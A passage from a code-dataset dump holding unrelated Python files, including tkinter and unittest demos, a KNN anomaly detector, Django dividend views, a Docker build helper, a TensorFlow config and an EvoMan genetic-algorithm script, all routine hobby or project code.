machine.handle_AppendEntries(msg)\n\n\n","sub_path":"dabeaz/raft/machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":9189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"328008768","text":"from tkinter import *\nroot=Tk()\nroot.title(\"My First window\")\n\ndef msg(event=\"\"):\n print(\"Good morning\")\n\n\nroot.bind(\"\",msg)\nentry=Entry(root)\nentry.place(x=50,y=50)\nbtn1=Button(root,text=\"Button1\",fg=\"red\",bg=\"yellow\",font=(\"Comic Sans Ms\",15,\"bold\"),command=msg)\nbtn1.place(x=100,y=100)\nquitbutton = Button(root, text=\"Close Me\", command=quit)\nquitbutton.pack()\nroot.geometry(\"400x500+400+100\")\nroot.resizable(0,0)\nroot.mainloop()","sub_path":"tkinterplace.py","file_name":"tkinterplace.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"143402216","text":"# Test the cp_lib.app_base module\n\nimport logging\nimport time\nimport unittest\n\nimport cp_lib.time_until as time_until\n\n\nclass TestTimeUntil(unittest.TestCase):\n\n def test_seconds_until_next_minute(self):\n \"\"\"\n :return:\n \"\"\"\n\n print() # move past the '.'\n\n now = time.time()\n logging.debug(\"Now = {} sec\".format(time.asctime()))\n\n result = time_until.seconds_until_next_minute(now)\n logging.debug(\"Result = {} sec\".format(result))\n\n # self.assertTrue(os.path.exists(expect))\n\n return\n\n\nif __name__ == '__main__':\n # logging.basicConfig(level=logging.INFO)\n logging.basicConfig(level=logging.DEBUG)\n unittest.main()\n","sub_path":"test/test_time_until.py","file_name":"test_time_until.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449614805","text":"from sklearn.neighbors import NearestNeighbors\nfrom sklearn.neighbors import KDTree\nimport numpy as np\n\nclass knn():\n def __init__(self, k, anomaly_ratio):\n self.k = k \n self.leaf_size = 30\n self.metric = 'euclidean'\n self.anomaly_ratio = anomaly_ratio\n def run(self,data):\n #find kth nearest neighbor\n kdt = KDTree(data, self.leaf_size, self.metric)\n k_dist, k_index = kdt.query(data, self.k+1) #find the distances and the indexes of k nearest neighbor of all instances\n kth_dist = k_dist[:,self.k] # for each instance, select the distance to the kth nearest neighbor\n\n return kth_dist\n def detect_anomaly(self, kth_dist):\n # find the instances with largest distances as anomalies\n num_anomalies = self.anomaly_ratio * len(kth_dist) # number of anomalies we are expecting\n distance_descending = np.argsort(kth_dist)[::-1]\n anomalies_index = distance_descending[:num_anomalies]\n return anomalies_index\n\n","sub_path":"Algorithms/baselines/knn/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"276412650","text":"import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\n\nimport options\nimport helpers\n\nstart_date = datetime.datetime(year=2019, month=4, day=3)\n\n\ndag = DAG(\n 'counters_cleaner',\n description='Сохранение статистики',\n schedule_interval='0 0 * * *',\n start_date=start_date,\n dagrun_timeout=datetime.timedelta(minutes=10),\n catchup=False,\n default_args=options.dag_default_kwargs,\n)\n\noperator = BashOperator(\n task_id='counters_cleaner_task',\n bash_command=helpers.get_python_cmd('counters_cleaner.py'),\n depends_on_past=False,\n dag=dag,\n)\n","sub_path":"misc/airflow/dags/counters_cleaner.py","file_name":"counters_cleaner.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"152612477","text":"# Create your views here.\n\nfrom django.views.generic.list import ListView\n\nfrom django.http import HttpResponseRedirect\nfrom django.views import View\n\nimport pandas as pd\nimport io\nimport csv\n\nfrom django.urls import reverse\n\nfrom django_gotolong.amfi.models import Amfi\nfrom django_gotolong.bstmtdiv.models import BstmtDiv\nfrom django_gotolong.indices.models import Indices\nfrom django_gotolong.fratio.models import Fratio\nfrom django_gotolong.trendlyne.models import Trendlyne\nfrom django_gotolong.gweight.models import Gweight\nfrom django_gotolong.dividend.models import Dividend\n\nfrom django_gotolong.lastrefd.models import Lastrefd, lastrefd_update\n\nfrom django.db.models import OuterRef, Subquery, ExpressionWrapper, F, IntegerField, Count\nfrom django.db.models import (Sum, Count)\nfrom django.db.models.functions import (Round)\n\nimport fuzzymatcher\n\n\nclass DividendListView(ListView):\n model = Dividend\n\n # if pagination is desired\n # paginate_by = 300\n # filter_backends = [filters.OrderingFilter,]\n # ordering_fields = ['sno', 'nse_symbol']\n\n def get_queryset(self):\n return Dividend.objects.all().filter(divi_user_id=self.request.user.id)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DividendTickerListView(ListView):\n model = Dividend\n\n # if pagination is desired\n # paginate_by = 300\n # filter_backends = [filters.OrderingFilter,]\n # ordering_fields = ['sno', 'nse_symbol']\n\n def get_queryset(self):\n return Dividend.objects.all().filter(divi_user_id=self.request.user.id). \\\n values('divi_ticker').annotate(Total=Round(Sum('divi_amount'))).order_by('-Total')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass DividendRefreshView(View):\n fr_buy = {}\n fr_hold = {}\n fr_enabled = {}\n isin_industry_dict = {}\n debug_level = 1\n\n def get(self, request):\n self.dividend_refresh(request)\n return HttpResponseRedirect(reverse(\"dividend-list\"))\n\n def __init__(self):\n super(DividendRefreshView, self).__init__()\n\n def dividend_refresh(self, request):\n debug_level = 1\n # declaring template\n template = \"dividend/dividend_list.html\"\n\n df_bstmtdiv = pd.DataFrame.from_records(BstmtDiv.objects.all().\n filter(bsdiv_user_id=self.request.user.id).values())\n df_amfi = pd.DataFrame.from_records(Amfi.objects.all().values())\n\n left_on = [\"bsdiv_remarks\", ]\n right_on = [\"comp_name\", \"nse_symbol\"]\n\n # get the header\n bstmtdiv_top = df_bstmtdiv.head()\n print('df_bstmtdiv: columns')\n print(bstmtdiv_top)\n\n # Most of these were matching to CANFINHOMES due to FIN in it\n\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FINDIV', value='DIV', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FIN DIV', value='DIV', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FINALDIV', value='DIV', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='FINAL DIV', value='DIV', inplace=True, regex=True)\n\n # most of these were matching with M&M for mahindra and mahindra ltd\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='LTD', value='', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='Ltd', value='', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='LIMITED', value='', inplace=True, regex=True)\n df_bstmtdiv['bsdiv_remarks'].replace(to_replace='Limited', value='', inplace=True, regex=True)\n\n matched_results = fuzzymatcher.fuzzy_left_join(df_bstmtdiv,\n df_amfi,\n left_on,\n right_on,\n left_id_col='bsdiv_id',\n right_id_col='comp_rank')\n\n # drop NaN\n matched_results.dropna(inplace=True)\n print(\"matched_results\")\n print(matched_results)\n\n cols = [\n \"bsdiv_id\", \"bsdiv_user_id\", \"bsdiv_date\", \"bsdiv_remarks\", \"comp_name\", \"nse_symbol\", \"bsdiv_amount\",\n \"best_match_score\"\n ]\n\n df = matched_results[cols].sort_values(by=['best_match_score'], ascending=False)\n\n # drop NaN entries\n df.dropna(inplace=True)\n print(\"df\")\n print(df)\n\n # breakpoint()\n\n # import pdb\n # pdb.set_trace()\n\n # first delete all existing dividend objects\n Dividend.objects.all().filter(divi_user_id=self.request.user.id).delete()\n\n data_set = df.to_csv(header=False, index=False)\n\n io_string = io.StringIO(data_set)\n next(io_string)\n print('first record', io_string)\n skipped_records = 0\n for column in csv.reader(io_string, delimiter=',', quotechar='\"'):\n\n if debug_level > 1:\n print(column)\n\n divi_id = column[0].strip()\n divi_user_id = column[1].strip()\n divi_date = column[2].strip()\n divi_remarks = column[3].strip()\n divi_company = column[4].strip()\n divi_ticker = column[5].strip()\n divi_amount = column[6].strip()\n divi_score = column[7].strip()\n\n try:\n _, created = Dividend.objects.update_or_create(\n divi_id=divi_id,\n divi_user_id=divi_user_id,\n divi_date=divi_date,\n divi_remarks=divi_remarks,\n divi_company=divi_company,\n divi_ticker=divi_ticker,\n divi_amount=divi_amount,\n divi_score=divi_score,\n )\n except Exception as e:\n print('Exception ')\n print(e)\n\n # Updated Dividend objects\n lastrefd_update(\"dividend\")\n","sub_path":"django_gotolong/dividend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605595683","text":"import os,sys\nimport string\nfrom optparse import OptionParser\nimport glob\nimport json\nimport subprocess\n\n__version__=\"1.0\"\n__status__ = \"Dev\"\n\n\ndef create_docker_file(prj):\n\n line_list = [\n \"FROM nginx:1.21.0-alpine as production\"\n ,\"ENV NODE_ENV production\"\n ,\"RUN mkdir -p /data/shared/%s\" % (prj)\n ,\"RUN ln -s /data/shared/%s /usr/share/nginx/html/ln2data\" % (prj)\n ,\"RUN ln -s /data/shared/%s/releases /usr/share/nginx/html/ln2releases\" % (prj)\n ,\"RUN ln -s /data/shared/%s/downloads /usr/share/nginx/html/ln2downloads\" % (prj)\n ,\"RUN ln -s /data/shared/%s/releases/ftp /usr/share/nginx/html/ftp\" % (prj)\n ,\"COPY ./build /usr/share/nginx/html\"\n ,\"COPY nginx.conf /etc/nginx/conf.d/default.conf\"\n ,\"EXPOSE 80\"\n ,\"CMD [\\\"nginx\\\", \\\"-g\\\", \\\"daemon off;\\\"]\"\n ]\n with open(\"Dockerfile\", \"w\") as FW:\n FW.write(\"%s\\n\" % (\"\\n\\n\".join(line_list)))\n return\n\n###############################\ndef main():\n\n \n usage = \"\\n%prog [options]\"\n parser = OptionParser(usage,version=\"%prog version___\")\n parser.add_option(\"-s\",\"--server\",action=\"store\",dest=\"server\",help=\"dev/tst/beta/prd\")\n (options,args) = parser.parse_args()\n\n for key in ([options.server]):\n if not (key):\n parser.print_help()\n sys.exit(0)\n\n server = options.server\n\n\n config_obj = json.loads(open(\"./conf/config.json\", \"r\").read())\n\n image = config_obj[\"project\"] + \"_app_%s\" % (server) \n container = \"running_\" + image\n app_port = config_obj[\"app_port\"][server]\n data_path = config_obj[\"data_path\"]\n \n with open(\".env.production\", \"w\") as FW:\n FW.write(\"REACT_APP_SERVER=%s\\n\" % (server))\n FW.write(\"REACT_APP_ROOT_URL=%s\\n\" % (config_obj[\"app_root\"][server]))\n FW.write(\"REACT_APP_API_URL=%s\\n\" % (config_obj[\"api_root\"][server]))\n FW.write(\"REACT_APP_APP_VERSION=1.1\\n\")\n\n\n create_docker_file(config_obj[\"project\"])\n\n cmd_list = []\n if os.path.isdir(data_path) == False:\n cmd_list.append(\"mkdir -p %s\" % (data_path))\n\n cmd = \"npm run build\"\n cmd_list.append(cmd)\n cmd = \"docker build -t %s .\" % (image)\n cmd_list.append(cmd)\n\n for c in [container]:\n cmd = \"docker ps --all |grep %s\" % (c)\n container_id = subprocess.getoutput(cmd).split(\" \")[0].strip()\n if container_id.strip() != \"\":\n cmd_list.append(\"docker rm -f %s \" % (container_id))\n\n cmd = \"docker create --name %s -p 127.0.0.1:%s:80 -v %s:%s %s\" % (container,app_port,data_path, data_path, image)\n cmd_list.append(cmd)\n\n for cmd in cmd_list:\n #print (cmd)\n x = subprocess.getoutput(cmd)\n print (x)\n \n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"app/create_app_container.py","file_name":"create_app_container.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129660063","text":"import tensorflow as tf\nimport os\n\nfrom main import main as m\n\nflags = tf.app.flags\n\n# names and directories 模型名称,文件路径\nflags.DEFINE_string(\"model_name\", \"basic\", \"Model name [basic]\")\nflags.DEFINE_string(\"data_dir\", \"data/squad/small_data\", \"Data dir [data/squad]\")\nflags.DEFINE_string(\"run_id\", \"0\", \"to save model\")\nflags.DEFINE_string(\"out_base_dir\", \"out\", \"out base dir [out]\")\nflags.DEFINE_string(\"answer_path\", \"\", \"answer path []\")\nflags.DEFINE_string(\"load_path\", \"\", \"load path []\") # 已有模型地址\nflags.DEFINE_string(\"glove_dir\", \"\", \"\")\n\n# device placement 使用CPU or GPU\nflags.DEFINE_string(\"device\", \"/cpu:0\", \"default device for summing gradients. [/cpu:0]\")\n\n# essential training and test options 运行方式,是否加载已有模型\nflags.DEFINE_string(\"mode\", \"train\", \"train | test | debug\")\nflags.DEFINE_boolean(\"load\", False, \"load saved data? [True]\") # 默认加载已有model\n\n# load data glove相关\nflags.DEFINE_integer(\"glove_vector_size\", 200, \"glove vector size\")\n\n# training / test parameters 训练参数\nflags.DEFINE_integer(\"train_batch_size\",5, \"batch size []\")\nflags.DEFINE_integer(\"num_epochs\", 12, \"total number of epochs for training [12]\")\nflags.DEFINE_string(\"num_steps\", 20000, \"number of steps []\")\nflags.DEFINE_integer(\"load_step\", 0, \"load step [0]\")\nflags.DEFINE_integer(\"init_lr\", 0.5, \"initial learning rate []\")\nflags.DEFINE_integer(\"input_keep_prob\", 0.8, \"keep prob for the dropout of LSTM weights []\")\nflags.DEFINE_integer(\"hidden_size\", 75, \"hidden size\")\nflags.DEFINE_integer(\"max_question_word\", 50, \"a question has 100 words at most\")\nflags.DEFINE_integer(\"max_passage_word\", 500, \"a passage has 300 words at most \")\nflags.DEFINE_integer(\"word_emb_size\", 200, \"word2vec length, related to glove\")\nflags.DEFINE_integer(\"char_emb_size\", 10, \"char-level word embedding size\")\nflags.DEFINE_string(\"cell_fn\", tf.nn.rnn_cell.GRUCell, \"recurrent unit\")\n\n# optimizations\n\n\n# longing and saving options\nflags.DEFINE_integer(\"log_period\", 10, \"log period\")\nflags.DEFINE_integer(\"eval_period\", 10, \"eval period\")\nflags.DEFINE_integer(\"save_period\", 10, \"save period\")\nflags.DEFINE_integer(\"max_to_keep\", 20, \"maximum number of recent checkpoints to keep, save model\")\n\n# threshold for speed and less memory usage\n# advanced training options\n\n# ablation options\nflags.DEFINE_bool(\"use_char_emb\", False, \"use char emb? [True]\")\n# flags.DEFINE_bool(\"\")\n\ndef main(_):\n config = flags.FLAGS\n config.out_dir = os.path.join(config.out_base_dir, config.model_name, str(config.run_id).zfill(2))\n m(config)\n\nif __name__ == \"__main__\":\n tf.app.run()","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"458266832","text":"from main import *\r\nimport os.path\r\n\r\nprint('Blackjack! by Liav')\r\nprint('\\n')\r\n\r\nif os.path.exists('playername.txt'):\r\n player_name = str(open('playername.txt','r').read())\r\n\r\nif os.path.exists('playername.txt') == False:\r\n open('playername.txt','w')\r\n player_name = ''\r\n \r\nif os.path.exists('currentscore.txt'):\r\n whitelist = set('-0123456789')\r\n score_n = ''.join(filter(whitelist.__contains__, open('currentscore.txt','r').read()))\r\n\r\nif os.path.exists('currentscore.txt') == False:\r\n open('currentscore.txt','w')\r\n score_n = 0\r\n\r\ndef invalid_char(text):\r\n whitelist2 = set('0123456789abcdefghijklmnopqrstuvwxyz')\r\n char = ''.join(filter(lambda x: x not in whitelist2, text.lower()))\r\n return len(char) == 0\r\n\r\ndef new_name():\r\n global player_name\r\n while invalid_char(player_name) == False or len(player_name) == 0:\r\n player_name = input('Enter your name please: ')\r\n\r\n else:\r\n open('playername.txt','w').write(player_name)\r\n print('\\n')\r\n print(\"Welcome, \" + color.BOLD + f\"{(player_name)}\" + color.END)\r\n start()\r\n\r\nif len(player_name) == 0:\r\n print('New player!')\r\n new_name()\r\n\r\nif invalid_char(player_name) == False:\r\n print('Invalid name detected.')\r\n new_name()\r\n\r\nelse:\r\n print(\"Welcome back, \" + color.BOLD + f\"{(player_name)}\" + color.END)\r\n print(f\"Your current score is {(score_n)}\")\r\n print('\\n')\r\n start()","sub_path":"welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"631006880","text":"\n\ndef division(dv, dvs):\n \"\"\"Division\n Args:\n dv (float): Dividendo\n dvs (float): Divisor\n Returns:\n float: Cociente\n \"\"\"\n res = 0.0\n mensaje = \"\"\n\n try:\n res = dv/dvs\n except ZeroDivisionError as ze:\n print(\"ZeroDivisionError :\", ze.__class__)\n mensaje = \"La division por cero no es permitida\"\n except Exception as e:\n print(\"Exception : \", e.__class__)\n else:\n print(\"La division se realizo correctamente\")\n\n return res, mensaje\n\n\ndef verifica_elemento_lista(*args, indice=0):\n\n dato = -1\n existe = 0\n\n try:\n if args:\n for index, el in enumerate(args):\n print(f\" [{index}] [{el}] \")\n dato = args[indice]\n if not dato is None:\n existe = 1\n else:\n print(f\" No hay datos en la lista {args}\")\n except IndexError as ie:\n print(f\" [{type(ie)}]: El elemento con el indice: {indice} no existe en la lista.\")\n except Exception as e:\n print(f\"Excepcion general del programa\", e.__class__)\n \n return dato, existe\n \n\ndef diccionario():\n\n llave = 'blanco'\n\n try:\n colores = {'rojo': 'red', 'verde': 'green', 'negro': 'black'}\n dato = colores[llave]\n print(\"El dato es : \", dato)\n except KeyError as ke:\n print(\"La llave ingresa del diccionario no existe. Error: \", ke.__class__)\n except Exception as e:\n print(\"Excepcion Global\", e.__class__)\n else:\n print(f\"El dato con la llave {llave} correcta\")\n finally:\n print(\"Este bloque se ejecuta siempre\")\n\n\ndef agregar_una_vez(lista, elemento):\n\n try:\n if elemento in lista:\n raise ValueError\n else:\n lista.append(elemento)\n except ValueError as ve:\n print(\n f\"Error: Imposible añadir elementos duplicados => [{elemento}].\", ve.__class__)\n except Exception as e:\n print(\"Excepcion Genral \", e.__class__)\n else:\n \" Pasa por aqui cuando se ejecuta correctamente la logica\"\n finally:\n print(\"Siempre se ejecuta esto........\")\n\n\nif __name__ == \"__main__\":\n\n lista = [1, 5, -2]\n\n \"\"\"elemento = 7\n agregar_una_vez(lista,10)\n agregar_una_vez(lista,8)\n agregar_una_vez(lista,12)\n print(lista)\"\"\"\n\n index = 1\n dato, existe = verifica_elemento_lista(*lista,indice=index)\n print(f\"El dato con el indice = {index} es = {dato} \") if existe != 0 else print(\n \"Lo sentimos no existe el elemento\")\n","sub_path":"ejercicios-clase/unidad7/excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388050149","text":"\nimport sys\nimport os\n# from _pickle import dump\nsys.path.insert(0, os.path.abspath('..'))\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\n\nclass MapData(object):\n def __init__(self):\n return\n def get_df(self):\n filepath = '../data/map_data.txt'\n names = ['x','y','landmark_id']\n df = pd.read_csv(filepath, sep=None, header=None, names=names,engine='python')\n print(df.describe())\n return df\n def disp_landmarks(self,df):\n fig, ax = plt.subplots()\n ax.scatter(df['x'], df['y'], color='green')\n \n for i, txt in enumerate(df['landmark_id']):\n ax.annotate(str(txt), (df['x'][i],df['y'][i]))\n \n gt_df = self.get_gtdf()\n ax.scatter(gt_df['x'], gt_df['y'])\n ax.set_title('ground truth and landmarks')\n return\n def get_gtdf(self):\n filepath = '../data/gt_data.txt'\n names = ['x','y','yaw']\n df = pd.read_csv(filepath, sep=None, header=None, names=names,engine='python')\n print(df.describe())\n return df\n def run(self):\n df = self.get_df()\n self.disp_landmarks(df)\n plt.show()\n return\n\n\n\n\nif __name__ == \"__main__\": \n obj= MapData()\n obj.run()\n ","sub_path":"visualization/map_data.py","file_name":"map_data.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217578640","text":"# coding =utf-8\nimport gzip\nimport re\nfrom os import listdir, mkdir, sep\nfrom datetime import datetime\nfrom multiprocessing import Pool\n\nfrom_folder = \"20140717\"\nto_folder = from_folder + \"_url\"\ntry:\n mkdir(to_folder)\nexcept:\n pass\n\n\nurl_pattern = re.compile(r'http\\:\\/\\/([^\\:]*?)\\/')\n\n\ndef soft_excute(fn):\n def call_func(*args, **kwargs):\n try:\n fn(*args, **kwargs)\n print(\"[OK] \", datetime.now().__str__(), \" @\", fn.__str__(), \" args:\", args[:5])\n except:\n print(\"[Ignore] \", datetime.now().__str__(), \" @\", fn.__str__(), \" args:\", args[:5])\n\n return call_func\n\n\n# @soft_excute\ndef parse_data(filename):\n try:\n f = gzip.open(from_folder + sep + filename, \"rt\", encoding=\"utf-8\")\n parsed_data = []\n for line in f:\n url = re.findall(url_pattern, line)\n if url:\n # print(url)\n line_tuple = line.split(\"|\")\n if len(line_tuple) != 26:\n continue\n # print(line)\n # imei , url, lac, ci, traffic_type, start_time, datatype, up_traffic, down_traffic,\n data_i = (line_tuple[3], url[0], line_tuple[1], line_tuple[2],\n line_tuple[4], line_tuple[5].split(\".\")[0],\n line_tuple[20].split(\";\")[0],line_tuple[8], line_tuple[9], )\n # print(new_tuple)\n parsed_data.append(\",\".join(data_i) + \"\\n\")\n f.close()\n to_write = \"\".join(parsed_data)\n to_filename = filename.split(\".\")[0] + \".csv\"\n with open(to_folder + sep + to_filename, \"wt\") as f:\n f.write(to_write)\n print(\"[OK] \", datetime.now().__str__(), \" @\", filename)\n except:\n print(\"[Ignore] \", datetime.now().__str__(), \" @\", filename)\n\n\ndef parse_all():\n item_files = listdir(from_folder)\n for item_file in item_files:\n parse_data(item_file)\n\n\ndef pare_all_parrerall(cores=12):\n pool = Pool(cores)\n item_files = listdir(from_folder)\n print(\"n_job: \", len(item_files), \" :\", item_files[:4])\n for item_file in item_files:\n pool.apply_async(parse_data, args=(item_file,))\n t0 = datetime.now()\n print(\"start...@\", t0)\n pool.close()\n pool.join()\n t1 = datetime.now()\n print(\"finish...@\", t1)\n print(\"time used:\", t1 - t0)\n\n\nif __name__ == '__main__':\n pare_all_parrerall()\n","sub_path":"0parseurl.py","file_name":"0parseurl.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"339681419","text":"from random import randint\nfrom faker import Faker\nfrom faker.providers import internet\nfrom . import db\nfrom .models import Post, Customer, Order, TicketsTiers, CusaEvents, User, Blog\nfrom sqlalchemy.exc import IntegrityError\n\n\ndef posts(count=5):\n fake = Faker()\n user_count = User.query.count()\n for i in range(count):\n u = User.query.offset(randint(0, user_count - 1)).first()\n p = Post(body=fake.text(),\n timestamp=fake.past_date(),\n author=u,\n title=fake.word(),\n intro=fake.sentence()\n )\n db.session.add(p)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef users(count=5):\n fake = Faker()\n i = 0\n while i < count:\n u = User(email=fake.email(),\n username=fake.user_name(),\n password='password',\n confirmed=True,\n name=fake.name(),\n location=fake.city(),\n about_me=fake.text(),\n )\n db.session.add(u)\n try:\n db.session.commit()\n i += 1\n except IntegrityError:\n db.session.rollback()\n\n\ndef customers(count=5):\n fake = Faker()\n for i in range(count):\n c = Customer(phone=fake.phone_number())\n db.session.add(c)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef orders(count=5):\n # fake = Faker()\n customer_count = Customer.query.count()\n for i in range(count):\n c = Customer.query.offset(randint(0, customer_count - 1)).first()\n o = Order(ticket=TicketsTiers.REG, customer=c, event=CusaEvents.SINGER)\n o.token = o.generate_token()\n db.session.add(o)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef blog(count=5):\n fake = Faker()\n user_count = User.query.count()\n for i in range(count):\n u = User.query.offset(randint(0, user_count - 1)).first()\n p = Blog(created_at=fake.past_datetime(start_date=\"-30d\", tzinfo=None),\n title=' '.join(fake.words(nb=2, ext_word_list=None)),\n intro=' '.join(fake.words(nb=3, ext_word_list=None)),\n avatar_url='https://yiban.io/blog/wp-content/uploads/2019/06/%E9%BB%98%E8%AE%A4%E6%A0%87%E9%A2%98_%E5%85%AC%E4%BC%97%E5%8F%B7%E5%B0%81%E9%9D%A2%E9%A6%96%E5%9B%BE_2019.06.19-2-wps%E5%9B%BE%E7%89%87.png',\n blog_url='https://raw.githubusercontent.com/v1siuol/leetCode/master/README.md',\n background_color=fake.hex_color(),\n font_color=fake.hex_color(),\n author=u\n )\n db.session.add(p)\n try:\n db.session.commit()\n db.session.refresh(p)\n p.order_idx = p.id\n db.session.commit()\n\n except IntegrityError:\n db.session.rollback()\n","sub_path":"app/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"432091424","text":"###############################################################################\n# EvoMan FrameWork - V1.0 2016 \t\t\t #\n# DEMO : Neuroevolution - Genetic Algorithm with neural network. #\n# Author: Karine Miras \t\t\t #\n# karine.smiras@gmail.com \t\t\t\t #\n###############################################################################\n\n# imports framework\nimport sys\nsys.path.insert(0, 'evoman')\nfrom environment import Environment\nfrom demo_controller import player_controller\n\n# imports other libs\nimport time\nimport numpy as np\nfrom math import fabs,sqrt\nimport glob, os\n\n# choose this for not using visuals and thus making experiments faster\nheadless = True\nif headless:\n os.environ[\"SDL_VIDEODRIVER\"] = \"dummy\"\n\nn_hidden_neurons = 10\n\nexperiment_name = 'multi_demo'\nif not os.path.exists(experiment_name):\n os.makedirs(experiment_name)\n\n# initializes simulation in multi evolution mode, for multiple static enemies.\nenv = Environment(experiment_name=experiment_name,\n enemies=[7,8],\n multiplemode=\"yes\",\n playermode=\"ai\",\n player_controller=player_controller(n_hidden_neurons),\n enemymode=\"static\",\n level=2,\n speed=\"fastest\")\n\n# default environment fitness is assumed for experiment\n\nenv.state_to_log() # checks environment state\n\n\n#### Optimization for controller solution (best genotype-weights for phenotype-network): Ganetic Algorihm ###\n\nini = time.time() # sets time marker\n\n\n# genetic algorithm params\n\nrun_mode = 'train' # train or test\n\n# number of weights for multilayer with 10 hidden neurons.\nn_vars = (env.get_num_sensors()+1)*n_hidden_neurons + (n_hidden_neurons+1)*5\n\ndom_u = 1\ndom_l = -1\nnpop = 100\ngens = 30\nmutation = 0.2\nlast_best = 0\n\nnp.random.seed(420)\n\n\n\n# runs simulation\ndef simulation(env,x):\n f,p,e,t = env.play(pcont=x)\n return f\n\n# normalizes\ndef norm(x,pfit_pop):\n\n if ( max(pfit_pop) - min(pfit_pop) ) > 0:\n x_norm = ( x - min(pfit_pop) )/( max(pfit_pop) - min(pfit_pop) )\n else:\n x_norm = 0\n\n if x_norm <= 0:\n x_norm = 0.0000000001\n return x_norm\n\n\n# evaluation\ndef evaluate(x):\n return np.array(list(map(lambda y: simulation(env,y), x)))\n\n\n# tournament\ndef tournament(pop):\n c1 = np.random.randint(0,pop.shape[0], 1)\n c2 = np.random.randint(0,pop.shape[0], 1)\n\n if fit_pop[c1] > fit_pop[c2]:\n return pop[c1][0]\n else:\n return pop[c2][0]\n\n\n# limits\ndef limits(x):\n\n if x>dom_u:\n return dom_u\n elif x= 15:\n\n file_aux = open(experiment_name+'/results.txt','a')\n file_aux.write('\\ndoomsday')\n file_aux.close()\n\n pop, fit_pop = doomsday(pop,fit_pop)\n notimproved = 0\n\n best = np.argmax(fit_pop)\n std = np.std(fit_pop)\n mean = np.mean(fit_pop)\n\n\n # saves results\n file_aux = open(experiment_name+'/results.txt','a')\n print( '\\n GENERATION '+str(i)+' '+str(round(fit_pop[best],6))+' '+str(round(mean,6))+' '+str(round(std,6)))\n file_aux.write('\\n'+str(i)+' '+str(round(fit_pop[best],6))+' '+str(round(mean,6))+' '+str(round(std,6)) )\n file_aux.close()\n\n # saves generation number\n file_aux = open(experiment_name+'/gen.txt','w')\n file_aux.write(str(i))\n file_aux.close()\n\n # saves file with the best solution\n np.savetxt(experiment_name+'/best.txt',pop[best])\n\n # saves simulation state\n solutions = [pop, fit_pop]\n env.update_solutions(solutions)\n env.save_state()\n\n\n\n\nfim = time.time() # prints total execution time for experiment\nprint( '\\nExecution time: '+str(round((fim-ini)/60))+' minutes \\n')\n\n\nfile = open(experiment_name+'/neuroended', 'w') # saves control (simulation has ended) file for bash loop file\nfile.close()\n\n\nenv.state_to_log() # checks environment state\n","sub_path":"optimization_generalist_demo.py","file_name":"optimization_generalist_demo.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"77255043","text":"import time\nfrom socket import *\nimport time\nfrom threading import Thread\nimport sys\nimport threading\ndef threaded(func):\n def wrapper(*_args, **kwargs):\n t = threading.Thread(target=func, args=_args)\n t.start()\n return\n return wrapper\n\n\nclass thread_motor(Thread):\n\n def run(self):\n\n inicio = time.time()\n fim = 0\n while True:\n \n if fim - inicio > 3:\n #print(fim - inicio)\n \n inicio = time.time()\n pong()\n \n fim = time.time()\n\n\n \nlog_file=open('MET_Logs.log', 'w')\ntry:\n arquivo = open(\"IP-Raspberry.txt\",\"r\")\n IP = arquivo.readline()\nexcept:\n print(\"O Arquivo IP-Raspberry.txt está corrompido ou foi excluido, crie o arquivo e coloque o IP do Raspberry Pi\",file=log_file)\n sys.exit()\n\n\n \nIP = str(IP)\n\nPORT = 